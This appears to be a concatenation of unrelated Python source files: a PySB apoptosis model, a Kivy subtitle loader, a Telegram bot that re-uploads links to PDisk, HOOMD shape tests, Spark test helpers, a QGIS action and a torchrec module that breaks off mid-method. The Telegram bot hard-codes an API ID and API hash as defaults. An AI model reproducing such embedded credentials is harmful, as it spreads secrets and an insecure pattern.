Rule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)
Rule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)
Rule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None) + BidU(C8A=None) | C8A(BidU=1) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)
Rule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1) % BidU(C8A=1) >> C8A(BidU=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)
Rule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)
Rule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)
Rule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)
Rule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None) | Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)
Rule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None) >> Xiap(Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)
Rule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)
Rule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)
Rule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)
Rule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)
Rule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)
Rule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)
Rule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)
Rule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)
Rule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)
Rule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)
Rule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)
Initial(Ligand(Receptor=None), Ligand_0)
Initial(ParpU(C3A=None), ParpU_0)
Initial(C8A(BidU=None), C8A_0)
Initial(BaxM(BidM=None, BaxA=None), BaxM_0)
Initial(Apop(C3pro=None, Xiap=None), Apop_0)
Initial(Fadd(Receptor=None, C8pro=None), Fadd_0)
Initial(ParpC(), ParpC_0)
Initial(Xiap(Apop=None, C3A=None), Xiap_0)
Initial(C9(), C9_0)
Initial(C3ub(), C3ub_0)
Initial(C8pro(Fadd=None), C8pro_0)
Initial(C3pro(Apop=None), C3pro_0)
Initial(CytoCM(BaxA=None), CytoCM_0)
Initial(CytoCC(), CytoCC_0)
Initial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), BaxA_0)
Initial(ApafI(), ApafI_0)
Initial(BidU(C8A=None), BidU_0)
Initial(BidT(), BidT_0)
Initial(C3A(Xiap=None, ParpU=None), C3A_0)
Initial(ApafA(), ApafA_0)
Initial(BidM(BaxM=None), BidM_0)
Initial(Receptor(Ligand=None, Fadd=None), Receptor_0)
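# Hedged usage note (added for illustration; not part of the exported model).
# A PySB model defined this way is normally simulated with one of the
# pysb.simulator backends; `tspan` below is an arbitrary placeholder time grid.
#
# from pysb.simulator import ScipyOdeSimulator
# import numpy as np
# tspan = np.linspace(0, 20000, 100)
# result = ScipyOdeSimulator(model, tspan).run()
# print(result.observables['ParpC_obs'][-1])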
|
py | 1a4b86ff2ad93fb2223b3da206787794f9c8a763 | # File name: subtitles.py
import kivy
kivy.require('1.9.0')
from kivy.network.urlrequest import UrlRequest
class Subtitles:
def __init__(self, url):
self.subtitles = []
req = UrlRequest(url, self.got_subtitles)
def got_subtitles(self, req, results):
self.subtitles = results['captions']
def next(self, secs):
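        # Return the caption whose [startTime, startTime + duration] window (in
        # milliseconds) contains the requested playback position; the 12-second
        # shift appears to compensate for an offset between the video clock and
        # the caption timestamps. Returns None when no caption is active.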
for sub in self.subtitles:
ms = secs*1000 - 12000
st = 'startTime'
d = 'duration'
if ms >= sub[st] and ms <= sub[st] + sub[d]:
return sub
return None
|
py | 1a4b87e070af05b355f4ec56836a294cf8470c4b | from os import environ
import os
from urllib.parse import urlparse
import aiohttp
from pyrogram import Client, filters
import requests
from bs4 import BeautifulSoup
import re
API_ID = environ.get('API_ID', '4029928')
API_HASH = environ.get('API_HASH', '99dae01a51f441a77499e01ab08ebdd0')
BOT_TOKEN = environ.get('BOT_TOKEN')
PDISK_API_KEY = environ.get('PDISK_API_KEY')
CHANNEL = environ.get('CHANNEL', 'KayiChat_Official')
bot = Client('pdisk bot',
api_id=API_ID,
api_hash=API_HASH,
bot_token=BOT_TOKEN,
workers=50,
sleep_threshold=0)
@bot.on_message(filters.command('start') & filters.private)
async def start(bot, message):
await message.reply(
f"**Hiya 👋{message.chat.first_name}!**\n\n"
"**A Simple PDisk Uploader Bot.\n\n➠ Send Me Any Direct Link, YouTube Link Or Video Link I Will Upload To PDisk And Give Direct Link\n\nMade With❤BY @BamsiByrek**")
@bot.on_message(filters.text & filters.private)
async def pdisk_uploader(bot, message):
new_string = str(message.text)
try:
pdisk_link = await multi_pdisk_up(new_string)
await message.reply(f'{pdisk_link}', quote=True)
except Exception as e:
await message.reply(f'Error: {e}', quote=True)
@bot.on_message(filters.photo & filters.private)
async def pdisk_uploader(bot, message):
new_string = str(message.caption)
try:
pdisk_link = await multi_pdisk_up(new_string)
if(len(pdisk_link) > 1020):
await message.reply(f'{pdisk_link}', quote=True)
else:
await bot.send_photo(message.chat.id, message.photo.file_id, caption=f'{pdisk_link}')
except Exception as e:
await message.reply(f'Error: {e}', quote=True)
async def get_ptitle(url):
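    # Scrape the page <title> to build a caption prefixed with @CHANNEL, then
    # dig the embedded video id out of the raw HTML to rebuild a shareable
    # pdisks.com link. Returns [caption, share_url].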
html_text = requests.get(url).text
soup = BeautifulSoup(html_text, 'html.parser')
for title in soup.find_all('title'):
pass
title = list(title.get_text())
title = title[8:]
str = '@' + CHANNEL + ' '
for i in title:
str = str + i
lst = list(html_text.split(","))
c = 0
for i in lst:
if ("""videoid""" in i):
found = lst[c]
break
c += 1
# pdisk.net link
pdisk_video_id = list(found.split(":"))
video_id = pdisk_video_id[2]
video_id = list(video_id.split(","))
v_id = video_id[0]
v_len = len(v_id)
v_id = v_id[1:v_len - 2]
v_url = 'https://www.pdisks.com/share-video?videoid=' + v_id
res = [str, v_url]
return res
async def pdisk_up(link):
if ('pdisk' in link or 'kuklink' in link or 'kofilink' in link or 'cofilink' in link or 'bit' in link):
res = await get_ptitle(link)
title_pdisk = res[0]
link = res[1]
else:
title_new = urlparse(link)
title_new = os.path.basename(title_new.path)
title_pdisk = '@' + CHANNEL + title_new
res = requests.get(
'http://linkapi.net/open/create_item?link_type=link&content_src=' + link + '&source=2000&api_key=' + PDISK_API_KEY + '&dir_id=0&title=' + title_pdisk + '&description=Join_' + CHANNEL + '_for_more_like_this')
data = res.json()
data = dict(data)
print(data)
v_id = data['data']['item_id']
v_url = 'https://www.pdisks.com/share-video?videoid=' + v_id
return (v_url)
async def multi_pdisk_up(ml_string):
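    # Tokenize the incoming text, drop username/self-promo tokens, find every
    # http(s) URL, upload each one through pdisk_up(), splice the returned
    # PDisk links back into the original message, then append the footer.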
new_ml_string = list(map(str, ml_string.split(" ")))
new_ml_string = await remove_username(new_ml_string)
new_join_str = "".join(new_ml_string)
urls = re.findall(r'(https?://[^\s]+)', new_join_str)
nml_len = len(new_ml_string)
u_len = len(urls)
url_index = []
count = 0
for i in range(nml_len):
for j in range(u_len):
if (urls[j] in new_ml_string[i]):
url_index.append(count)
count += 1
new_urls = await new_pdisk_url(urls)
url_index = list(dict.fromkeys(url_index))
i = 0
for j in url_index:
new_ml_string[j] = new_ml_string[j].replace(urls[i], new_urls[i])
i += 1
new_string = " ".join(new_ml_string)
return await addFooter(new_string)
async def new_pdisk_url(urls):
new_urls = []
for i in urls:
new_urls.append(await pdisk_up(i))
return new_urls
async def remove_username(new_List):
for i in new_List:
if('@' in i or 't.me' in i or 'https://bit.ly/3m4gabB' in i or 'https://bit.ly/pdisk_tuts' in i or 'telegra.ph' in i):
new_List.remove(i)
return new_List
async def addFooter(str):
footer = """
━━━━━━━━━━━━━━━
⦿ Made With♥️BY @bamsibyrek
━━━━━━━━━━━━━━━
✪ »JOIN CHANNEL ➡️ t.me/""" + CHANNEL
return str + footer
bot.run()
|
py | 1a4b88a9c835181f5ac1948ce25ac2862dfb9183 | class PlanNode:
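    # Doubly-linked-list node holding one assembly-plan record; nextNode and
    # prevNode are attached later through the setter methods below.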
def __init__(self, numNo, strSerialNumber, strModel, numModelNumber,
dateStart, numAssemblyOrder, dateEnd, strOrderOrigin):
self.numNo = numNo
self.strSerialNumber = strSerialNumber
self.strModel = strModel
self.numModelNumber = numModelNumber
self.dateStart = dateStart
self.numAssemblyOrder = numAssemblyOrder
self.dateEnd = dateEnd
self.strOrderOrigin = strOrderOrigin
def printOut(self):
print('No :', self.numNo, ', SerialNum : ', self.strSerialNumber,
',Model:', self.strModel, ',Start Date:',
self.dateStart)
def getNextNode(self):
# Problem 1. complete this method
node = self.nextNode
return node
def getPrevNode(self):
# Problem 1. complete this method
node = self.prevNode
return node
def setNextNode(self, node):
# Problem 1. complete this method
self.nextNode = node
def setPrevNode(self, node):
# Problem 1. complete this method
self.prevNode = node |
py | 1a4b89f66a1d83f756c086f0f00a19ebba0c1a5f | import hoomd
from hoomd import mcm
import unittest
hoomd.context.initialize()
print(hoomd.__file__)
class test_type_shapes(unittest.TestCase):
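    # Each test builds a two-particle snapshot, attaches one mcm integrator,
    # sets the shape parameters for type 'A', and checks that get_type_shapes()
    # reports the expected shape type name, vertex count, and/or diameter.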
def setUp(self):
hoomd.context.initialize()
def test_type_shapes_convex_polygon(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.convex_polygon(seed=10);
test_verts = [(1, 0), (0, 1), (-1, -1)]
self.mc.shape_param.set('A', vertices=test_verts)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Polygon')
self.assertEqual(len(shape_types[0]['vertices']), 3)
self.assertTrue(all([shape_types[0]['vertices'][i] == list(test_verts[i]) for i in range(len(test_verts))]))
def test_type_shapes_simple_polygon(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.simple_polygon(seed=10);
test_verts = [(1, 0), (0, 1), (-1, -1)]
self.mc.shape_param.set('A', vertices=test_verts)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Polygon')
self.assertEqual(len(shape_types[0]['vertices']), 3)
self.assertTrue(all([shape_types[0]['vertices'][i] == list(test_verts[i]) for i in range(len(test_verts))]))
def test_type_shapes_disks(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.sphere(seed=10);
test_diam = 1
self.mc.shape_param.set('A', diameter = test_diam)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Disk')
self.assertEqual(shape_types[0]['diameter'], test_diam)
self.assertNotIn('vertices', shape_types[0])
def test_type_shapes_spheres(self):
box = hoomd.data.boxdim(10, dimensions=3)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.sphere(seed=10);
test_diam = 1
self.mc.shape_param.set('A', diameter = test_diam)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'Sphere')
self.assertEqual(shape_types[0]['diameter'], test_diam)
self.assertNotIn('vertices', shape_types[0])
def test_type_shapes_convex_polyhedron(self):
box = hoomd.data.boxdim(10, dimensions=2)
snap = hoomd.data.make_snapshot(N=2, box=box)
snap.particles.types = ['A']
self.system = hoomd.init.read_snapshot(snap)
self.mc = mcm.integrate.convex_polyhedron(seed=10);
test_verts = [(1, 0, 0), (0, 1, 0), (-1, -1, 0)]
self.mc.shape_param.set('A', vertices=test_verts)
shape_types = self.mc.get_type_shapes()
self.assertEqual(shape_types[0]['type'], 'ConvexPolyhedron')
self.assertEqual(len(shape_types[0]['vertices']), 3)
self.assertTrue(all([shape_types[0]['vertices'][i] == list(test_verts[i]) for i in range(len(test_verts))]))
def tearDown(self):
del self.mc
del self.system
hoomd.context.initialize()
|
py | 1a4b8a7ba29ee4bcd8376b2cae5459491ac19644 | # Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from conftest import is_allowing_any_non_gpu, get_non_gpu_allowed
from pyspark.sql import SparkSession, DataFrame
from spark_init_internal import get_spark_i_know_what_i_am_doing
def _from_scala_map(scala_map):
ret = {}
# The value we get is a scala map, not a java map, so we need to jump through some hoops
keys = scala_map.keys().iterator()
while keys.hasNext():
key = keys.next()
ret[key] = scala_map.get(key).get()
return ret
_spark = get_spark_i_know_what_i_am_doing()
# Have to reach into a private member to get access to the API we need
_orig_conf = _from_scala_map(_spark.conf._jconf.getAll())
_orig_conf_keys = _orig_conf.keys()
def is_tz_utc(spark=_spark):
"""
true if the tz is UTC else false
"""
# Now we have to do some kind of ugly internal java stuff
jvm = spark.sparkContext._jvm
utc = jvm.java.time.ZoneId.of('UTC').normalized()
sys_tz = jvm.java.time.ZoneId.systemDefault().normalized()
return utc == sys_tz
def _set_all_confs(conf):
for key, value in conf.items():
if _spark.conf.get(key, None) != value:
_spark.conf.set(key, value)
def reset_spark_session_conf():
"""Reset all of the configs for a given spark session."""
_set_all_confs(_orig_conf)
#We should clear the cache
_spark.catalog.clearCache()
# Have to reach into a private member to get access to the API we need
current_keys = _from_scala_map(_spark.conf._jconf.getAll()).keys()
for key in current_keys:
if key not in _orig_conf_keys:
_spark.conf.unset(key)
def _check_for_proper_return_values(something):
"""We don't want to return an DataFrame or Dataset from a with_spark_session. You will not get what you expect"""
if (isinstance(something, DataFrame)):
raise RuntimeError("You should never return a DataFrame from a with_*_session, you will not get the results that you expect")
def with_spark_session(func, conf={}):
"""Run func that takes a spark session as input with the given configs set."""
reset_spark_session_conf()
_set_all_confs(conf)
ret = func(_spark)
_check_for_proper_return_values(ret)
return ret
def with_cpu_session(func, conf={}):
"""Run func that takes a spark session as input with the given configs set on the CPU."""
copy = dict(conf)
copy['spark.rapids.sql.enabled'] = 'false'
return with_spark_session(func, conf=copy)
def with_gpu_session(func, conf={}):
"""
Run func that takes a spark session as input with the given configs set on the GPU.
    Note that this forces you into test mode unless non-GPU fallbacks are explicitly allowed. It is not a requirement, but is
simplest for right now.
"""
copy = dict(conf)
copy['spark.rapids.sql.enabled'] = 'true'
if is_allowing_any_non_gpu():
copy['spark.rapids.sql.test.enabled'] = 'false'
else:
copy['spark.rapids.sql.test.enabled'] = 'true'
copy['spark.rapids.sql.test.allowedNonGpu'] = ','.join(get_non_gpu_allowed())
return with_spark_session(func, conf=copy)
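# Hedged usage sketch (added for illustration; not part of the original module):
# how the helpers above are typically driven from a test. The callable receives
# the shared SparkSession and must return plain Python data, never a DataFrame.
#
# def _count_rows(spark):
#     return spark.range(100).count()
#
# assert with_cpu_session(_count_rows) == with_gpu_session(_count_rows)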
|
py | 1a4b8a80ed25ac95d86dd2896add2627f55057ce | # -*- coding: utf-8 -*-
"""
***************************************************************************
EditModelAction.py
---------------------
Date : February 2019
Copyright : (C) 2019 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'February 2019'
__copyright__ = '(C) 2019, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import QgsProcessingModelAlgorithm, QgsProcessing, QgsApplication
from processing.gui.ContextAction import ContextAction
from processing.script.ScriptEditorDialog import ScriptEditorDialog
class ExportModelAsPythonScriptAction(ContextAction):
def __init__(self):
super().__init__()
self.name = QCoreApplication.translate('ExportModelAsPythonScriptAction', 'Export Model as Python Algorithm…')
def isEnabled(self):
return isinstance(self.itemData, QgsProcessingModelAlgorithm)
def icon(self):
return QgsApplication.getThemeIcon('/mActionSaveAsPython.svg')
def execute(self):
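        # Render the selected model as a QgsProcessingAlgorithm Python subclass
        # (4-space indent) and open the generated source in the script editor.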
alg = self.itemData
dlg = ScriptEditorDialog(None)
dlg.editor.setText('\n'.join(alg.asPythonCode(QgsProcessing.PythonQgsProcessingAlgorithmSubclass, 4)))
dlg.show()
|
py | 1a4b8c1ae75cb0bf9723d65908008de0947cc46b | #!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import copy
from collections import OrderedDict
from typing import Dict, Any, Optional, List, Iterator, Tuple
import torch
import torch.nn as nn
from fbgemm_gpu.split_table_batched_embeddings_ops import (
IntNBitTableBatchedEmbeddingBagsCodegen,
EmbeddingLocation,
)
from torch import Tensor
from torchrec.modules.embedding_configs import (
EmbeddingBagConfig,
DataType,
DATA_TYPE_NUM_BITS,
data_type_to_sparse_type,
dtype_to_data_type,
pooling_type_to_pooling_mode,
)
from torchrec.modules.embedding_modules import (
EmbeddingBagCollection as OriginalEmbeddingBagCollection,
ebc_get_embedding_names,
)
from torchrec.modules.embedding_modules import EmbeddingBagCollectionInterface
from torchrec.sparse.jagged_tensor import (
KeyedJaggedTensor,
KeyedTensor,
)
try:
torch.ops.load_library("//deeplearning/fbgemm/fbgemm_gpu:sparse_ops")
except OSError:
pass
# OSS
try:
import fbgemm_gpu # @manual # noqa
except ImportError:
pass
def quantize_state_dict(
module: nn.Module,
table_name_to_quantized_weights: Dict[str, Tuple[Tensor, Tensor]],
data_type: DataType,
) -> torch.device:
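    # Row-wise quantize every embedding table in the module's state dict to the
    # requested DataType, store (quantized weight, scale/shift) pairs keyed by
    # table name, and return the device the original weights lived on.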
device = torch.device("cpu")
for key, tensor in module.state_dict().items():
# Extract table name from state dict key.
# e.g. ebc.embedding_bags.t1.weight
splits = key.split(".")
assert splits[-1] == "weight"
table_name = splits[-2]
device = tensor.device
num_bits = DATA_TYPE_NUM_BITS[data_type]
if tensor.is_meta:
quant_weight = torch.empty(
(tensor.shape[0], (tensor.shape[1] * num_bits) // 8),
device="meta",
# pyre-fixme[16]: Item `Tensor` of `Union[Tensor, Module]` has
# no attribute `weight`.
dtype=module.qconfig.weight().dtype,
)
scale_shift = torch.empty(
(tensor.shape[0], 4),
device="meta",
# pyre-fixme[16]: Item `Tensor` of `Union[Tensor, Module]` has
# no attribute `weight`.
dtype=module.qconfig.weight().dtype,
)
else:
quant_res = torch.ops.fbgemm.FloatToFusedNBitRowwiseQuantizedSBHalf(
tensor, num_bits
)
quant_weight, scale_shift = (
quant_res[:, :-4],
quant_res[:, -4:],
)
table_name_to_quantized_weights[table_name] = (quant_weight, scale_shift)
return device
class EmbeddingBagCollection(EmbeddingBagCollectionInterface):
"""
EmbeddingBagCollection represents a collection of pooled embeddings (EmbeddingBags).
This EmbeddingBagCollection is quantized for lower precision. It relies on fbgemm quantized ops
It processes sparse data in the form of KeyedJaggedTensor
with values of the form [F X B X L]
F: features (keys)
B: batch size
L: Length of sparse features (jagged)
and outputs a KeyedTensor with values of the form [B * (F * D)]
where
F: features (keys)
D: each feature's (key's) embedding dimension
B: batch size
Constructor Args:
table_name_to_quantized_weights (Dict[str, Tuple[Tensor, Tensor]]): map of tables to quantized weights
embedding_configs (List[EmbeddingBagConfig]): list of embedding tables
is_weighted: (bool): whether input KeyedJaggedTensor is weighted
device: (Optional[torch.device]): default compute device
Call Args:
features: KeyedJaggedTensor,
Returns:
KeyedTensor
Example::
table_0 = EmbeddingBagConfig(
name="t1", embedding_dim=3, num_embeddings=10, feature_names=["f1"]
)
table_1 = EmbeddingBagConfig(
name="t2", embedding_dim=4, num_embeddings=10, feature_names=["f2"]
)
        ebc = EmbeddingBagCollection(tables=[table_0, table_1])
# 0 1 2 <-- batch
# "f1" [0,1] None [2]
# "f2" [3] [4] [5,6,7]
# ^
# feature
features = KeyedJaggedTensor(
keys=["f1", "f2"],
values=torch.tensor([0, 1, 2, 3, 4, 5, 6, 7]),
offsets=torch.tensor([0, 2, 2, 3, 4, 5, 8]),
)
ebc.qconfig = torch.quantization.QConfig(
activation=torch.quantization.PlaceholderObserver.with_args(
dtype=torch.qint8
),
weight=torch.quantization.PlaceholderObserver.with_args(dtype=torch.qint8),
)
qebc = QuantEmbeddingBagCollection.from_float(ebc)
quantized_embeddings = qebc(features)
"""
def __init__(
self,
table_name_to_quantized_weights: Dict[str, Tuple[Tensor, Tensor]],
embedding_configs: List[EmbeddingBagConfig],
is_weighted: bool,
device: torch.device,
) -> None:
super().__init__()
self._is_weighted = is_weighted
self._embedding_bag_configs: List[EmbeddingBagConfig] = embedding_configs
self.embedding_bags: nn.ModuleList = nn.ModuleList()
self._lengths_per_embedding: List[int] = []
table_names = set()
for emb_config in self._embedding_bag_configs:
if emb_config.name in table_names:
raise ValueError(f"Duplicate table name {emb_config.name}")
table_names.add(emb_config.name)
emb_module = IntNBitTableBatchedEmbeddingBagsCodegen(
embedding_specs=[
(
"",
emb_config.num_embeddings,
emb_config.embedding_dim,
data_type_to_sparse_type(emb_config.data_type),
EmbeddingLocation.HOST
if device.type == "cpu"
else EmbeddingLocation.DEVICE,
)
],
pooling_mode=pooling_type_to_pooling_mode(emb_config.pooling),
weight_lists=[table_name_to_quantized_weights[emb_config.name]],
device=device,
)
self.embedding_bags.append(emb_module)
if not emb_config.feature_names:
emb_config.feature_names = [emb_config.name]
self._lengths_per_embedding.extend(
len(emb_config.feature_names) * [emb_config.embedding_dim]
)
self._embedding_names: List[str] = ebc_get_embedding_names(embedding_configs)
def forward(
self,
